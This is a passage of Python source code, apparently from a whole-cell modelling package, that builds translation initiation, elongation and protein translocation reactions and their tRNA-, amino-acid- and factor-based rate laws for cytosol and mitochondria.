    # Fraction of cytosolic tRNA imported into the mitochondrion; must be
    # a valid fraction.
    partition = options.get('mitochondrial_cytosolic_trna_partition', 0.01)
    if not 0. <= partition <= 1.:
        raise ValueError(
            'mitochondrial_cytosolic_trna_partition must be between 0 and 1')
    options['mitochondrial_cytosolic_trna_partition'] = partition

    options['selenoproteome'] = options.get('selenoproteome', [])
def gen_reactions(self):
    """ Generate reactions associated with submodel.

    For every mRNA in the knowledge base, three kinds of reactions are
    created:

    * a lumped, irreversible translation-initiation reaction that consumes
      a free ribosome, the mRNA's ribosome-binding-site species and the
      first amino acid together with ATP, GTP and water, and produces a
      ribosome-bound mRNA pseudo-species;
    * a lumped translation-elongation/termination reaction that consumes
      the ribosome-bound species, the remaining amino acids and energy
      metabolites, and releases the ribosome, the binding site and the
      protein (selenocysteine is assembled from serine plus selenophosphate
      on the tRNA, hence the extra participants in that branch);
    * one translocation reaction for each compartment, other than the
      compartment of translation, in which the protein species exists in
      the model.

    Side effects: populates ``self._allowable_queue_len`` (mRNA id ->
    (binding-site species, initial mean copy number)) and
    ``self._translocation_reactions`` (mRNA -> compartment -> reaction),
    and caches sequence compositions in ``gvar.transcript_ntp_usage`` and
    ``gvar.protein_aa_usage`` for reuse by other generator methods.
    """
    model = self.model
    cell = self.knowledge_base.cell

    cytoplasmic_ribosome = self.options.get('cytoplasmic_ribosome')
    mitochondrial_ribosome = self.options.get('mitochondrial_ribosome')
    amino_acid_id_conversion = self.options.get('amino_acid_id_conversion')
    codon_table = self.options['codon_table']
    cds = self.options['cds']
    selenoproteome = self.options['selenoproteome']

    cytosol = model.compartments.get_one(id='c')
    nucleus = model.compartments.get_one(id='n')
    mitochondrion = model.compartments.get_one(id='m')
    peroxisome = model.compartments.get_one(id='x')

    # Get metabolite species involved in reaction. Translation takes place
    # only in the cytosol and the mitochondrion, so only the species in
    # those two compartments are looked up.
    amino_acid_participants = list(amino_acid_id_conversion.values())
    other_metabolite_participants = ['atp', 'adp', 'amp', 'gtp', 'gdp', 'pi', 'ppi', 'h2o', 'h', 'selnp']
    metabolites = {}
    for met in amino_acid_participants + other_metabolite_participants:
        met_species_type = model.species_types.get_one(id=met)
        metabolites[met] = {
            'c': met_species_type.species.get_one(compartment=cytosol),
            'm': met_species_type.species.get_one(compartment=mitochondrion)
        }

    self.submodel.framework = wc_ontology['WC:next_reaction_method']

    print('Start generating translation and translocation submodel...')

    # Create initiation and elongation reactions for each mRNA
    init_el_rxn_no = 0
    trans_rxn_no = 0
    self._allowable_queue_len = {}
    self._translocation_reactions = {}
    mrna_kbs = [i for i in cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType) \
        if i.type==wc_kb.eukaryote.TranscriptType.mRna]
    for mrna_kb in mrna_kbs:

        # mRNAs located in the cytosol are translated by the cytoplasmic
        # ribosome; all others by the mitochondrial ribosome.
        mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
        if mrna_kb_compartment_id == 'c':
            translation_compartment = cytosol
            ribosome_complex = model.species_types.get_one(
                name=cytoplasmic_ribosome).species.get_one(compartment=cytosol)
        else:
            translation_compartment = mitochondrion
            ribosome_complex = model.species_types.get_one(
                name=mitochondrial_ribosome).species.get_one(compartment=mitochondrion)

        # Create initiation reaction
        # Cache the nucleotide composition of the transcript if it has not
        # been computed yet. (The cached values themselves are not needed
        # in this method, so nothing is read back here.)
        if mrna_kb.id not in gvar.transcript_ntp_usage:
            seq = mrna_kb.get_seq()
            seq_upper = seq.upper()
            gvar.transcript_ntp_usage[mrna_kb.id] = {
                'A': seq_upper.count('A'),
                'C': seq_upper.count('C'),
                'G': seq_upper.count('G'),
                'U': seq_upper.count('U'),
                'len': len(seq)
            }

        # Determine the amino-acid content of the protein, reusing the
        # cached counts in gvar.protein_aa_usage when available.
        aa_content = {}
        if mrna_kb.protein.id in gvar.protein_aa_usage:
            for aa, aa_id in amino_acid_id_conversion.items():
                if gvar.protein_aa_usage[mrna_kb.protein.id][aa]:
                    aa_content[aa_id] = gvar.protein_aa_usage[mrna_kb.protein.id][aa]
        else:
            gvar.protein_aa_usage[mrna_kb.protein.id] = {i:0 for i in list(amino_acid_id_conversion.keys())}
            if codon_table == 1:
                codon_id = 1
            else:
                # codon_table maps protein id -> NCBI translation table number
                codon_id = codon_table[mrna_kb.protein.id]
            _, raw_seq, start_codon = mrna_kb.protein.get_seq_and_start_codon(table=codon_id, cds=cds)
            if mrna_kb.gene.id in selenoproteome:
                # In selenoproteins an internal stop symbol is read through
                # as selenocysteine (U); a genuine terminal stop is dropped.
                processed_seq = raw_seq[:-1] if raw_seq.endswith('*') else raw_seq
                protein_seq = ''.join(i if i!='*' else 'U' for i in processed_seq)
            else:
                protein_seq = ''.join(i for i in raw_seq if i!='*')
            for aa in protein_seq:
                aa_id = amino_acid_id_conversion[aa]
                if aa_id not in aa_content:
                    aa_content[aa_id] = 1
                    gvar.protein_aa_usage[mrna_kb.protein.id][aa] = 1
                else:
                    aa_content[aa_id] += 1
                    gvar.protein_aa_usage[mrna_kb.protein.id][aa] += 1
            gvar.protein_aa_usage[mrna_kb.protein.id]['*'] = raw_seq.count('*')
            gvar.protein_aa_usage[mrna_kb.protein.id]['len'] = len(protein_seq)
            gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa'] = protein_seq[0]
            gvar.protein_aa_usage[mrna_kb.protein.id]['start_codon'] = str(start_codon).upper()

        first_aa = model.species_types.get_one(id=amino_acid_id_conversion[
            gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa']])

        ribo_binding_site_species = model.species_types.get_one(
            id='{}_ribosome_binding_site'.format(mrna_kb.id)).species[0]
        self._allowable_queue_len[mrna_kb.id] = (ribo_binding_site_species,
            ribo_binding_site_species.distribution_init_concentration.mean)

        # Pseudo-species representing the mRNA with a bound ribosome; its
        # physical properties are the ribosome's plus the first amino acid's.
        ribo_bound_species_type = model.species_types.get_or_create(
            id='ribo_bound_{}'.format(mrna_kb.id),
            name='Ribosome bound {}'.format(mrna_kb.name),
            type=wc_ontology['WC:pseudo_species'],
            )
        ribo_bound_species_type.structure = wc_lang.ChemicalStructure(
            empirical_formula = ribosome_complex.species_type.structure.empirical_formula +\
                first_aa.structure.empirical_formula,
            molecular_weight = ribosome_complex.species_type.structure.molecular_weight +\
                first_aa.structure.molecular_weight,
            charge = ribosome_complex.species_type.structure.charge +\
                first_aa.structure.charge,
            )
        ribo_bound_species = model.species.get_or_create(
            species_type=ribo_bound_species_type, compartment=translation_compartment)
        ribo_bound_species.id = ribo_bound_species.gen_id()

        conc_model = model.distribution_init_concentrations.create(
            species=ribo_bound_species,
            units=unit_registry.parse_units('molecule'),
            )
        conc_model.id = conc_model.gen_id()

        init_reaction = model.reactions.create(
            submodel=self.submodel, id='translation_initiation_' + mrna_kb.id,
            name='translation initiation of ' + mrna_kb.name,
            reversible=False, comments='Set to irreversible to model only the net flux')

        # Adding participants to LHS
        # Include 2 GTP hydrolysis and 1 ATP hydrolysis at the initiation factors
        # Include 1 ATP hydrolysis for the charging of tRNA-met (or other start amino acid)
        init_reaction.participants.append(
            ribosome_complex.species_coefficients.get_or_create(
            coefficient=-1))
        init_reaction.participants.append(
            ribo_binding_site_species.species_coefficients.get_or_create(
            coefficient=-1))
        init_reaction.participants.append(first_aa.species.get_one(
            compartment=translation_compartment).species_coefficients.get_or_create(
            coefficient=-1))
        init_reaction.participants.append(metabolites['h2o'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=-5))
        init_reaction.participants.append(metabolites['atp'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=-2))
        init_reaction.participants.append(metabolites['gtp'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=-2))

        # Adding participants to RHS
        init_reaction.participants.append(
            ribo_bound_species.species_coefficients.get_or_create(
            coefficient=1))
        init_reaction.participants.append(metabolites['h'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=5))
        init_reaction.participants.append(metabolites['amp'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=1))
        init_reaction.participants.append(metabolites['adp'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=1))
        init_reaction.participants.append(metabolites['gdp'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=2))
        init_reaction.participants.append(metabolites['pi'][
            translation_compartment.id].species_coefficients.get_or_create(coefficient=5))

        # Create elongation reaction
        protein_model = model.species_types.get_one(id=mrna_kb.protein.id).species.get_or_create(
            model=model, compartment=translation_compartment)
        protein_model.id = protein_model.gen_id()

        if not protein_model.distribution_init_concentration:
            conc_model = model.distribution_init_concentrations.create(
                species=protein_model,
                mean=0.,
                units=unit_registry.parse_units('molecule'),
                comments='Created and set to zero because the protein is translated ' +\
                    'but not localized in this compartment'
                )
            conc_model.id = conc_model.gen_id()

        el_reaction = model.reactions.get_or_create(
            submodel=self.submodel, id='translation_elongation_' + mrna_kb.id,
            name='translation elongation of ' + mrna_kb.name,
            reversible=False, comments='Lumped reaction')

        # The first amino acid is consumed by the initiation reaction above.
        aa_content[amino_acid_id_conversion[gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa']]] -= 1

        # Adding participation of amino acids and other additional metabolites for forming selenocysteine
        serine_no = 0
        for aa_met, count in aa_content.items():
            if count:
                # To add selenocysteine, seryl-tRNA is formed and phosphorylated before reacting with selenophosphate
                if aa_met == amino_acid_id_conversion['U']:
                    serine_no = count
                    serine_met = amino_acid_id_conversion['S']
                    serine_species = metabolites[serine_met][translation_compartment.id]
                    # Merge with any serine coefficient already on the reaction
                    serine_coefficient = el_reaction.participants.get_one(
                        species=serine_species)
                    if serine_coefficient:
                        old_coef = serine_coefficient.coefficient
                        el_reaction.participants.remove(serine_coefficient)
                        el_reaction.participants.add(
                            serine_species.species_coefficients.get_or_create(
                                coefficient=old_coef - count))
                    else:
                        el_reaction.participants.append(
                            serine_species.species_coefficients.get_or_create(
                                coefficient=-count))
                    el_reaction.participants.append(metabolites['selnp'][
                        translation_compartment.id].species_coefficients.get_or_create(
                        coefficient=-count))
                    el_reaction.participants.append(metabolites['adp'][
                        translation_compartment.id].species_coefficients.get_or_create(
                        coefficient=count))
                    el_reaction.participants.append(metabolites['ppi'][
                        translation_compartment.id].species_coefficients.get_or_create(
                        coefficient=count))
                else:
                    aa_species = metabolites[aa_met][translation_compartment.id]
                    # Merge with any coefficient this amino acid already has
                    aa_coefficient = el_reaction.participants.get_one(
                        species=aa_species)
                    if aa_coefficient:
                        old_coef = aa_coefficient.coefficient
                        el_reaction.participants.remove(aa_coefficient)
                        el_reaction.participants.add(
                            aa_species.species_coefficients.get_or_create(
                                coefficient=old_coef - count))
                    else:
                        el_reaction.participants.append(
                            aa_species.species_coefficients.get_or_create(
                                coefficient=-count))

        # Adding general participants to LHS
        # Include 1 ATP hydrolysis for each tRNA-aa charging
        # Include 1 GTP hydrolysis for each peptide bond formation
        # Include 1 GTP hydrolysis at termination
        el_reaction.participants.append(ribo_bound_species.species_coefficients.get_or_create(
            coefficient=-1))
        el_reaction.participants.append(metabolites['gtp'][
            translation_compartment.id].species_coefficients.get_or_create(
            coefficient=-gvar.protein_aa_usage[mrna_kb.protein.id]['len']))
        el_reaction.participants.append(metabolites['atp'][
            translation_compartment.id].species_coefficients.get_or_create(
            coefficient=-(gvar.protein_aa_usage[mrna_kb.protein.id]['len']- 1 + serine_no)))
        el_reaction.participants.append(metabolites['h2o'][
            translation_compartment.id].species_coefficients.get_or_create(
            coefficient=-((gvar.protein_aa_usage[mrna_kb.protein.id]['len']-1)*2 + 1)))

        # Adding general participants to RHS
        el_reaction.participants.append(ribosome_complex.species_coefficients.get_or_create(
            coefficient=1))
        el_reaction.participants.append(ribo_binding_site_species.species_coefficients.get_or_create(
            coefficient=1))
        el_reaction.participants.append(protein_model.species_coefficients.get_or_create(
            coefficient=1))
        el_reaction.participants.append(metabolites['amp'][
            translation_compartment.id].species_coefficients.get_or_create(
            coefficient=gvar.protein_aa_usage[mrna_kb.protein.id]['len']-1))
        el_reaction.participants.append(metabolites['gdp'][
            translation_compartment.id].species_coefficients.get_or_create(
            coefficient=gvar.protein_aa_usage[mrna_kb.protein.id]['len']))
        el_reaction.participants.append(metabolites['pi'][
            translation_compartment.id].species_coefficients.get_or_create(
            coefficient=(gvar.protein_aa_usage[mrna_kb.protein.id]['len']-1)*3 + 1))
        el_reaction.participants.append(metabolites['h'][
            translation_compartment.id].species_coefficients.get_or_create(
            coefficient=3*gvar.protein_aa_usage[mrna_kb.protein.id]['len'] - 2 - serine_no))

        init_el_rxn_no += 1

        # Create translocation reactions
        all_localized_comp = [i.compartment for i in model.species_types.get_one(
            id=mrna_kb.protein.id).species if i.compartment!=translation_compartment]
        self._translocation_reactions[mrna_kb] = {}
        for compartment in all_localized_comp:
            trans_reaction = model.reactions.get_or_create(
                submodel=self.submodel, id='translocation_{}_{}_to_{}'.format(
                    mrna_kb.protein.id, translation_compartment.id ,compartment.id),
                name='translocation of {} from {} to {}'.format(
                    mrna_kb.protein.name, translation_compartment.name, compartment.name),
                reversible=False, comments='Lumped reaction')
            self._translocation_reactions[mrna_kb][compartment] = trans_reaction

            if compartment.id=='n':
                energy_compartment = nucleus # GTP-dependent translocation
                energy_reactant = 'gtp'
                energy_product = 'gdp'
            elif compartment.id=='m':
                energy_compartment = mitochondrion # ATP-dependent translocation
                energy_reactant = 'atp'
                energy_product = 'adp'
            elif compartment.id=='x':
                energy_compartment = peroxisome # ATP-dependent translocation
                energy_reactant = 'atp'
                energy_product = 'adp'
            else:
                energy_compartment = cytosol # GTP-dependent translocation to other organelles and membranes through er
                energy_reactant = 'gtp'
                energy_product = 'gdp'

            # Adding participants to LHS
            # Include ATP/GTP hydrolysis during (co-translational and post-translational) translocation
            trans_reaction.participants.append(protein_model.species_coefficients.get_or_create(
                coefficient=-1))
            trans_reaction.participants.append(model.species_types.get_one(id=energy_reactant).species.get_one(
                compartment = energy_compartment).species_coefficients.get_or_create(coefficient=-1))
            trans_reaction.participants.append(model.species_types.get_one(id='h2o').species.get_one(
                compartment = energy_compartment).species_coefficients.get_or_create(coefficient=-1))

            # Adding participants to RHS
            trans_reaction.participants.append(protein_model.species_type.species.get_one(
                compartment=compartment).species_coefficients.get_or_create(coefficient=1))
            trans_reaction.participants.append(model.species_types.get_one(id=energy_product).species.get_one(
                compartment = energy_compartment).species_coefficients.get_or_create(coefficient=1))
            trans_reaction.participants.append(model.species_types.get_one(id='pi').species.get_one(
                compartment = energy_compartment).species_coefficients.get_or_create(coefficient=1))
            trans_reaction.participants.append(model.species_types.get_one(id='h').species.get_one(
                compartment = energy_compartment).species_coefficients.get_or_create(coefficient=1))

            trans_rxn_no += 1

    print('{} reactions each for initiation and elongation and {} reactions for protein translocation '
        'have been generated'.format(init_el_rxn_no, trans_rxn_no))
def gen_rate_laws(self):
    """ Generate rate laws for the reactions in the submodel.

    Builds saturation-style response functions (via
    ``utils.gen_response_functions``) for tRNAs grouped by codon, for each
    amino acid, and for each group of initiation factors, elongation
    factors and translocation chaperones; then creates one forward rate
    law for every initiation, elongation and translocation reaction
    created by ``gen_reactions``. Each rate-law expression is a product of
    a rate constant, a driving species count and the relevant response
    functions, scaled by ``2**<number of response terms>``
    (presumably to compensate for each saturation term's half-maximal
    value of ~0.5 at the calibrated concentrations — TODO confirm).
    """
    model = self.model
    cell = self.knowledge_base.cell

    amino_acid_id_conversion = self.options.get('amino_acid_id_conversion')
    beta = self.options.get('beta')
    codon_table = self.options['codon_table']
    cds = self.options['cds']
    selenoproteome = self.options['selenoproteome']
    cytoplasmic_ribosome = self.options.get('cytoplasmic_ribosome')
    mitochondrial_ribosome = self.options.get('mitochondrial_ribosome')
    cytoplasmic_initiation_factors = self.options.get('cytoplasmic_initiation_factors')
    mitochondrial_initiation_factors = self.options.get('mitochondrial_initiation_factors')
    cytoplasmic_elongation_factors = self.options.get('cytoplasmic_elongation_factors')
    mitochondrial_elongation_factors = self.options.get('mitochondrial_elongation_factors')
    cytoplasmic_chaperones = self.options.get('cytoplasmic_chaperones')
    mitochondrial_chaperones = self.options.get('mitochondrial_chaperones')
    er_chaperones = self.options.get('er_chaperones')

    cytosol = model.compartments.get_one(id='c')
    nucleus = model.compartments.get_one(id='n')
    mitochondrion = model.compartments.get_one(id='m')
    peroxisome = model.compartments.get_one(id='x')
    er = model.compartments.get_one(id='r')

    # Constant parameters used to clamp the ribosome-binding-site count to
    # [0, 1] in the initiation rate expression (max(min(site, 1), 0)).
    max_bool = model.parameters.get_or_create(
        id='max_bool_substance',
        type=None,
        value=1,
        units=unit_registry.parse_units('molecule'),
        comments='Boolean switch for determining if binding site is still available'
        )
    min_bool = model.parameters.get_or_create(
        id='min_bool_substance',
        type=None,
        value=0,
        units=unit_registry.parse_units('molecule'),
        comments='Boolean switch for determining if binding site is still available'
        )

    # Generate response function for the tRNA(s) of each codon and for each amino acid
    trna_kb = cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType,
        type=wc_kb.eukaryote.TranscriptType.tRna)
    # Group tRNAs by the codon(s) their anticodon recognizes, separately
    # for the cytosol ('c') and the mitochondrion ('m').
    trna_grouping = {'c': {}, 'm': {}}
    for trna in trna_kb:
        # Property value has the form '<anticodon>:<amino acid>'
        anticodon_prop = trna.properties.get_one(property='anticodon:amino_acid').get_value().split(':')
        codons = ANTICODON_CODON_RECOGNITION_RULES[anticodon_prop[0]]
        for codon in codons:
            if trna.species[0].compartment.id == 'm':
                if codon in trna_grouping['m']:
                    trna_grouping['m'][codon]['trna'].append(trna.id)
                    trna_grouping['m'][codon]['anticodon'].append(anticodon_prop[0])
                else:
                    trna_grouping['m'][codon] = {
                        'trna': [trna.id],
                        'anticodon': [anticodon_prop[0]],
                        'aa': anticodon_prop[1],
                        }
            else:
                if codon in trna_grouping['c']:
                    trna_grouping['c'][codon]['trna'].append(trna.id)
                    trna_grouping['c'][codon]['anticodon'].append(anticodon_prop[0])
                else:
                    trna_grouping['c'][codon] = {
                        'trna': [trna.id],
                        'anticodon': [anticodon_prop[0]],
                        'aa': anticodon_prop[1],
                        }
    # One response function per codon per compartment, deduplicated by the
    # sorted set of recognizing anticodons.
    trna_functions = {'c': {}, 'm': {}}
    for comp, all_trnas in trna_grouping.items():
        for codon, trnas in all_trnas.items():
            compartment = mitochondrion if comp=='m' else cytosol
            # Import cytosolic tRNAs if mitochondrial tRNAs are not detected
            if comp=='m' and all(model.distribution_init_concentrations.get_one(
                    id='dist-init-conc-{}[m]'.format(i)).mean==0 for i in trnas['trna']):
                trnas['trna'] += trna_grouping['c'][codon]['trna']
                self._import_cytosolic_trna_into_mitochondria(trna_grouping['c'][codon]['trna'])
            factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
                model, beta, 'translation_{}'.format(compartment.id), 'translation_{}'.format(compartment.id),
                compartment, [trnas['trna']])
            objects = {
                wc_lang.Species: all_species,
                wc_lang.Parameter: all_parameters,
                wc_lang.Observable: all_observables,
                wc_lang.Function: all_volumes,
                }
            anticodons = '_'.join(sorted(set(trnas['anticodon'])))
            trna_factor_function = model.functions.get_one(
                id='trna_function_{}_{}'.format(anticodons, compartment.id))
            if not trna_factor_function:
                trna_expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
                assert error is None, str(error)
                trna_factor_function = model.functions.create(
                    id='trna_function_{}_{}'.format(anticodons, compartment.id),
                    name='tRNA response function for anticodon(s) {} in {}'.format(
                        anticodons, compartment.name),
                    expression=trna_expression,
                    units=unit_registry.parse_units(''),
                    )
            trna_functions[comp][codon] = {
                'function': trna_factor_function,
                'aa': trnas['aa'],
                'objects':objects,
                }
    # One response function per amino acid per compartment; selenocysteine
    # ('U') is skipped because it is handled through serine.
    aa_functions = {'c': {}, 'm': {}}
    for aa, aa_id in amino_acid_id_conversion.items():
        if aa!='U':
            for compartment in [cytosol, mitochondrion]:
                factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
                    model, beta, 'translation_{}'.format(compartment.id), 'translation_{}'.format(compartment.id),
                    compartment, [[aa_id]])
                objects = {
                    wc_lang.Species: all_species,
                    wc_lang.Parameter: all_parameters,
                    wc_lang.Observable: all_observables,
                    wc_lang.Function: all_volumes,
                    }
                aa_expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
                assert error is None, str(error)
                aa_functions[compartment.id][aa_id] = {
                    'function': model.functions.create(
                        id='aminoacid_function_{}_{}'.format(aa_id, compartment.id),
                        name='response function for amino acid {} in {}'.format(aa_id, compartment.name),
                        expression=aa_expression,
                        units=unit_registry.parse_units(''),
                        ),
                    'objects': objects
                    }
    # Generate response function for each translation initiation factor group
    init_factor_functions = {'c': {}, 'm': {}}
    for comp, factors in {cytosol: cytoplasmic_initiation_factors, mitochondrion: mitochondrial_initiation_factors}.items():
        n = 1
        for factor in factors:
            factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
                model, beta, 'translation_init_{}'.format(comp.id), 'translation_init_{}'.format(comp.id), comp, [factor])
            objects = {
                wc_lang.Species: all_species,
                wc_lang.Parameter: all_parameters,
                wc_lang.Observable: all_observables,
                wc_lang.Function: all_volumes,
                }
            expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
            assert error is None, str(error)
            # Keyed by the comma-joined factor ids for lookup when building
            # the reaction rate laws below.
            init_factor_functions[comp.id][','.join(factor)] = {
                'function': model.functions.create(
                    id='translation_init_factor_function_{}_{}'.format(comp.id, n),
                    name='response function for translation initiation factor {} in {}'.format(n, comp.name),
                    expression=expression,
                    units=unit_registry.parse_units(''),
                    ),
                'objects': objects}
            n += 1
    # Generate response function for each translation elongation factor group
    el_factor_functions = {'c': {}, 'm': {}}
    for comp, factors in {cytosol: cytoplasmic_elongation_factors, mitochondrion: mitochondrial_elongation_factors}.items():
        n = 1
        for factor in factors:
            factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
                model, beta, 'translation_el_{}'.format(comp.id), 'translation_el_{}'.format(comp.id), comp, [factor])
            objects = {
                wc_lang.Species: all_species,
                wc_lang.Parameter: all_parameters,
                wc_lang.Observable: all_observables,
                wc_lang.Function: all_volumes,
                }
            expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
            assert error is None, str(error)
            el_factor_functions[comp.id][','.join(factor)] = {
                'function': model.functions.create(
                    id='translation_el_factor_function_{}_{}'.format(comp.id, n),
                    name='response function for translation elongation factor {} in {}'.format(n, comp.name),
                    expression=expression,
                    units=unit_registry.parse_units(''),
                    ),
                'objects': objects}
            n += 1
    # Generate response function for each translocation factor/chaperone group
    trans_factor_functions = {'c': {}, 'm': {}, 'r': {}}
    for comp, factors in {cytosol: cytoplasmic_chaperones, mitochondrion: mitochondrial_chaperones, er: er_chaperones}.items():
        n = 1
        for factor in factors:
            factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
                model, beta, 'translocation_{}'.format(comp.id), 'translocation_{}'.format(comp.id), comp, [factor])
            objects = {
                wc_lang.Species: all_species,
                wc_lang.Parameter: all_parameters,
                wc_lang.Observable: all_observables,
                wc_lang.Function: all_volumes,
                }
            expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
            assert error is None, str(error)
            trans_factor_functions[comp.id][','.join(factor)] = {
                'function': model.functions.create(
                    id='translocation_factor_function_{}_{}'.format(comp.id, n),
                    name='response function for translocation factor {} in {}'.format(n, comp.name),
                    expression=expression,
                    units=unit_registry.parse_units(''),
                    ),
                'objects': objects}
            n += 1

    rate_law_no = 0
    mrna_kbs = [i for i in cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType) \
        if i.type==wc_kb.eukaryote.TranscriptType.mRna]
    for mrna_kb in mrna_kbs:

        mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
        if mrna_kb_compartment_id == 'c':
            ribosome_complex = model.species_types.get_one(
                name=cytoplasmic_ribosome).species.get_one(compartment=cytosol)
            initiation_factors = cytoplasmic_initiation_factors
            elongation_factors = cytoplasmic_elongation_factors
            translation_compartment = cytosol
        else:
            ribosome_complex = model.species_types.get_one(
                name=mitochondrial_ribosome).species.get_one(compartment=mitochondrion)
            initiation_factors = mitochondrial_initiation_factors
            elongation_factors = mitochondrial_elongation_factors
            translation_compartment = mitochondrion

        # Generate rate law for initiation
        init_reaction = model.reactions.get_one(id='translation_initiation_' + mrna_kb.id)

        specific_binding_constant = model.parameters.create(
            id='{}_ribosome_binding_constant'.format(mrna_kb.id),
            type=None,
            units=unit_registry.parse_units('molecule^-2 s^-1'),
            )

        objects = {
            wc_lang.Species: {},
            wc_lang.Parameter: {},
            wc_lang.Observable: {},
            wc_lang.Function: {},
            }

        expression_terms = []
        for factor in initiation_factors:
            factor_details = init_factor_functions[translation_compartment.id][','.join(factor)]
            expression_terms.append(factor_details['function'].id)
            for cl, dictionary in objects.items():
                dictionary.update(factor_details['objects'][cl])
            objects[wc_lang.Function][factor_details['function'].id] = factor_details['function']

        # start_codon and start_aa_met are also reused in the elongation
        # section further down in this loop iteration.
        start_codon = gvar.protein_aa_usage[mrna_kb.protein.id]['start_codon'].replace('U', 'T')
        start_aa_met = amino_acid_id_conversion[gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa']]

        matched_trnas = [trna_functions[translation_compartment.id][start_codon]]

        for codon_info in matched_trnas:
            expression_terms.append(codon_info['function'].id)
            objects[wc_lang.Function][codon_info['function'].id] = codon_info['function']
            for cl, dictionary in objects.items():
                dictionary.update(codon_info['objects'][cl])

        expression_terms.append(aa_functions[translation_compartment.id][
            start_aa_met]['function'].id)
        objects[wc_lang.Function][aa_functions[translation_compartment.id][
            start_aa_met]['function'].id] = aa_functions[translation_compartment.id][
            start_aa_met]['function']
        for cl, dictionary in objects.items():
            dictionary.update(aa_functions[translation_compartment.id][
                start_aa_met]['objects'][cl])

        objects[wc_lang.Species][ribosome_complex.id] = ribosome_complex
        objects[wc_lang.Species][self._allowable_queue_len[mrna_kb.id][0].id]= self._allowable_queue_len[mrna_kb.id][0]
        objects[wc_lang.Parameter][max_bool.id] = max_bool
        objects[wc_lang.Parameter][min_bool.id] = min_bool
        objects[wc_lang.Parameter][specific_binding_constant.id] = specific_binding_constant

        # Rate = k_binding * ribosome * clamp(binding site, 0..1) * factors;
        # the 2**N term rescales the N response-function factors.
        expression = '{} * {} * max(min({} , {}) , {}) * {} * 2**{}'.format(
            specific_binding_constant.id,
            ribosome_complex.id,
            self._allowable_queue_len[mrna_kb.id][0].id,
            max_bool.id,
            min_bool.id,
            ' * '.join(expression_terms),
            len(expression_terms),
            )

        init_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, objects)
        assert error is None, str(error)

        init_rate_law = model.rate_laws.create(
            direction=wc_lang.RateLawDirection.forward,
            type=None,
            expression=init_rate_law_expression,
            reaction=init_reaction,
            units=unit_registry.parse_units('s^-1'),
            )
        init_rate_law.id = init_rate_law.gen_id()

        # Generate rate law for elongation and termination
        elongation_reaction = model.reactions.get_one(id='translation_elongation_' + mrna_kb.id)

        objects = {
            wc_lang.Species: {},
            wc_lang.Parameter: {},
            wc_lang.Observable: {},
            wc_lang.Function: {},
            }

        expression_terms = []
        for factor in elongation_factors:
            factor_details = el_factor_functions[translation_compartment.id][','.join(factor)]
            expression_terms.append(factor_details['function'].id)
            for cl, dictionary in objects.items():
                dictionary.update(factor_details['objects'][cl])
            objects[wc_lang.Function][factor_details['function'].id] = factor_details['function']

        if codon_table == 1:
            codon_id = 1
        else:
            codon_id = codon_table[mrna_kb.protein.id]
        coding_rna_seq, _, _ = mrna_kb.protein.get_seq_and_start_codon(table=codon_id, cds=cds)
        codon_seq = str(coding_rna_seq).upper().replace('U','T')
        # Chop the coding sequence into codons (ceiling division keeps a
        # possible trailing partial codon, filtered by len(i)==3 below).
        non_processed_all_codons = [codon_seq[i * 3:(i + 1) * 3] for i in range((len(codon_seq) + 3 - 1) // 3 )]
        # Only codons after the start codon contribute tRNA terms.
        start_codon_index = 0
        for codon in non_processed_all_codons:
            if codon != start_codon:
                start_codon_index += 1
            else:
                break
        all_codons = sorted(set(non_processed_all_codons[start_codon_index + 1:]))

        for i in all_codons:
            if len(i)==3:
                if i in UNCONDITIONAL_STOP_CODON:
                    pass
                elif i in CONDITIONAL_STOP_CODON and mrna_kb.gene.id not in selenoproteome:
                    pass
                else:
                    if translation_compartment.id == 'c':
                        matched_trnas = [trna_functions[translation_compartment.id][i]]
                    else:
                        if i in trna_functions[translation_compartment.id]:
                            matched_trnas = [trna_functions[translation_compartment.id][i]]
                        else:
                            # No mitochondrial tRNA function for this codon
                            # yet: import the cytosolic tRNA(s) and build a
                            # mitochondrial response function on the fly.
                            cytosolic_trna_ids = trna_grouping['c'][i]['trna']
                            self._import_cytosolic_trna_into_mitochondria(cytosolic_trna_ids)
                            factor_exp, all_species, all_parameters, all_volumes, all_observables = \
                                utils.gen_response_functions(model, beta, 'translation_m', 'translation_m',
                                    translation_compartment, [cytosolic_trna_ids])
                            added_objects = {
                                wc_lang.Species: all_species,
                                wc_lang.Parameter: all_parameters,
                                wc_lang.Observable: all_observables,
                                wc_lang.Function: all_volumes,
                                }
                            anticodons = '_'.join(sorted(set(trna_grouping['c'][i]['anticodon'])))
                            trna_factor_function = model.functions.get_one(
                                id='trna_function_{}_m'.format(anticodons))
                            if not trna_factor_function:
                                trna_expression, error = wc_lang.FunctionExpression.deserialize(
                                    factor_exp[0], added_objects)
                                assert error is None, str(error)
                                trna_factor_function = model.functions.create(
                                    id='trna_function_{}_m'.format(anticodons),
                                    name='tRNA response function for anticodon(s) {} in {}'.format(
                                        anticodons, translation_compartment.name),
                                    expression=trna_expression,
                                    units=unit_registry.parse_units(''),
                                    )
